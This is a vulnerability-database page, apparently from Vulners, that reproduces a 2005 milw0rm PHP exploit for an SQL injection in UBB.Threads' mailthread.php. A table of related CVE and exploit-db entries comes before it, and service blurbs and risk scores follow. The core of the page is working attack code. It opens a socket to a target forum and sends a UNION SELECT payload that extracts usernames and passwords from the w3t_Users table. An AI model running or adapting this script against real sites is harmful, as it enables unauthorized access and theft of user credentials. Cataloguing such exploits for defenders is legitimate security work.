UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| UBB.threads < 6.5.1.1 editpost.php SQL Injection | 13 Mar 200500:00 | – | nessus | |
| UBB.threads < 6.5.2 beta Multiple Vulnerabilities | 20 Apr 200500:00 | – | nessus | |
| CVE-2005-2058 | 28 Jun 200504:00 | – | cve | |
| CVE-2005-2058 | 28 Jun 200504:00 | – | cvelist | |
| UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection | 24 Jun 200500:00 | – | exploitdb | |
| UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections | 24 Jun 200500:00 | – | exploitdb | |
| UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection | 24 Jun 200500:00 | – | exploitdb | |
| UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection | 24 Jun 200500:00 | – | exploitdb | |
| UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection | 24 Jun 200500:00 | – | exploitdb | |
| UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection | 24 Jun 200500:00 | – | exploitdb |
10
<?php
#############################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#############################################################################
# Vulnerable: UBBCentral SQL Injection
#
# Exploit By : MH_p0rtal
#
# Discovered By: James Bercegay
#############################################################################
# Gr33tz To ==> Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke
#
# And Iranian Hacking & Security Teams :
# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,
# Crouz Security Team & Simorgh-ev Security Team
#############################################################################
# ___________Config :
# please replace your address :
$url = "http:///www.example.com";
# please replace your dir address :
$dirs = "/dir/to/ubbt/";
# __________End Config
#############################################################################
$aa = strlen ( $dirs );
$ab = $aa - 1;
$ac = 0;
if (( $dirs[$ab] == "/" ) && ( $dirs[$ac] == "/" )) {
$merg = $dirs.mailthread.php;
$fc = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$fc) {
echo "Can't Connect\n";
} else {
$mh = "GET $merg?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat HTTP/1.1\r\n";
$mh .= "Host: $url\r\n";
$mh .= "Connection: Close\r\n\r\n";
fwrite($fc, $mh);
while (!feof($fc)) {
echo fgets($fc, 1024);
}
fclose($fc);
}
} else {
echo " Your pattern doesn't equal with Exploit directory pattern ";
}
?>
# milw0rm.com [2005-06-25]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01226